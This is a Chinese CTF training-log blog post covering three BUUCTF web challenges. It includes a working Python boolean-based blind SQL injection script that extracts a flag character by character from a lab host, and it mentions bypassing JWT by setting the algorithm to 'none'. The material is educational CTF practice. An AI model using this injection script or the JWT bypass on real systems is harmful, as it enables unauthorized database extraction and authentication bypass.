首页 > 其他分享 >[BUUCTF]第六天训练日志

[BUUCTF]第六天训练日志

时间:2022-10-31 10:04:17浏览次数:50  
标签:head BUUCTF EasyLogin HFCTF2020 mid 第六天 tail result 日志


文章目录

  • ​​[SUCTF 2019]EasyWeb​​
  • ​​[HFCTF2020]EasyLogin​​
  • ​​[CISCN2019 华北赛区 Day2 Web1]Hack World​​

[SUCTF 2019]EasyWeb

做了一半做不动了,换个时间来,花费了很多时间,不过会构造取反绕过了也不错

[HFCTF2020]EasyLogin

一开始以为是seesion伪造,发现我做错了,然后还加了转义字符,不知道怎么做了,看了别人的WP,也就是加密算法改为none绕过
​[HFCTF2020]EasyLogin​​[HFCTF2020]EasyLogin

[CISCN2019 华北赛区 Day2 Web1]Hack World

不算太难

import requests
import time
url = "http://b8c664e5-963f-4117-9a97-9ba6567e2a49.node3.buuoj.cn/index.php"

result = ''
i = 0

while True:
i = i + 1
head = 32
tail = 127

while head < tail:
mid = (head + tail) >> 1
payload = {
'id': f'0^if(ascii(substr((select(flag)from(flag)),({i}),(1)))>{mid},1,0)'
}
r = requests.post(url,data=payload)
print(r.text)
if "glzjin wants a girlfriend" in r.text:
head = mid + 1
else:
tail = mid
time.sleep(0.2)

if head != 32:
result += chr(head)
else:
break
print(result)

[BUUCTF]第六天训练日志_加密算法


标签:head,BUUCTF,EasyLogin,HFCTF2020,mid,第六天,tail,result,日志
From: https://blog.51cto.com/u_15847702/5808284

相关文章

  • [BUUCTF]第七天训练日志
    [SUCTF2019]EasyWeb​​suctf2019​​​​bypassopen_basedir的新方法​​阿姨熄灯了睡觉......
  • [BUUCTF]第十二天训练日志
    文章目录​​[SWPU2019]Web1​​[SWPU2019]Web1首先注册一个​​admin​​​用户提示已经被注册,估计要伪造admin身份了,发布广告那一页​​<script>alert(1);</scirpt>​​......
  • [BUUCTF]第三天训练日志
    文章目录​​[GKCTF2020]EZ三剑客-EzWeb​​​​[FBCTF2019]RCEService​​​​[BSidesCF2019]Kookie​​​​[CISCN2019华北赛区Day1Web5]CyberPunk​​​​[极客大挑......
  • [BUUCTF]第一天训练
    文章目录​​[BSidesCF2019]Futurella​​​​[BJDCTF2nd]duangShell​​​​反弹姿势1(未成功)​​​​反弹姿势2​​[BSidesCF2019]Futurella好久没看过这么简单的题目......
  • Linux文件系统与日志分析
     inode结构表每个文件的属性信息,比如:文件的大小,时间,类型,权限等,称为文件的元数据(metadata)元数据是存放在inode(indexnode)表中。inode表中有很多条记录组成,第一条记......
  • hadoop 日志存放位置
    初学者运行MapReduce作业时,经常会遇到各种错误,由于缺乏经验,往往不知所云,一般直接将终端打印的错误贴到搜索引擎上查找,以借鉴前人的经验。然而,对于hadoop而言,当遇到错误时,第......
  • 「MySQL高级篇」MySQL日志、事务原理 -- undolog、redolog、binlog、两阶段提交
    引言日志日志,在我们平时开发中主要的用途在于监控、备份,但在MySQL中,日志的功能远远不止这些,分别有用于记录的慢查询日志,回滚版本的undolog,宕机恢复的redolog、全量备份的bin......
  • 日志分析系统ELK(elasticsearch+logstash+kibana+filebeat)
    目录​​ 一、安装es​​​​ 二、安装Logstash​​​​三、安装Kibana​​​​四、安装Filebeat​​​​五、集群模式​​搭建日志分析系统ELK(elasticsearch+logstash+k......
  • 用SQL查Linux日志工具-q
    概述Linux文本查找命令不要太多:tail、head、cat、sed、more、less、awk,但对新手不友好。q是一个命令行工具,允许在任意文件或查询结果,如​​ps-ef​​​查询进程命令的结果......
  • spdlog日志库源码:logger类
    目录特性类图关系logger数据成员logger函数成员构造与析构构造函数拷贝构造、移动构造交换操作log()记录日志消息格式串普通字符串日志级别宽字符支持sink_it_:将log消息交......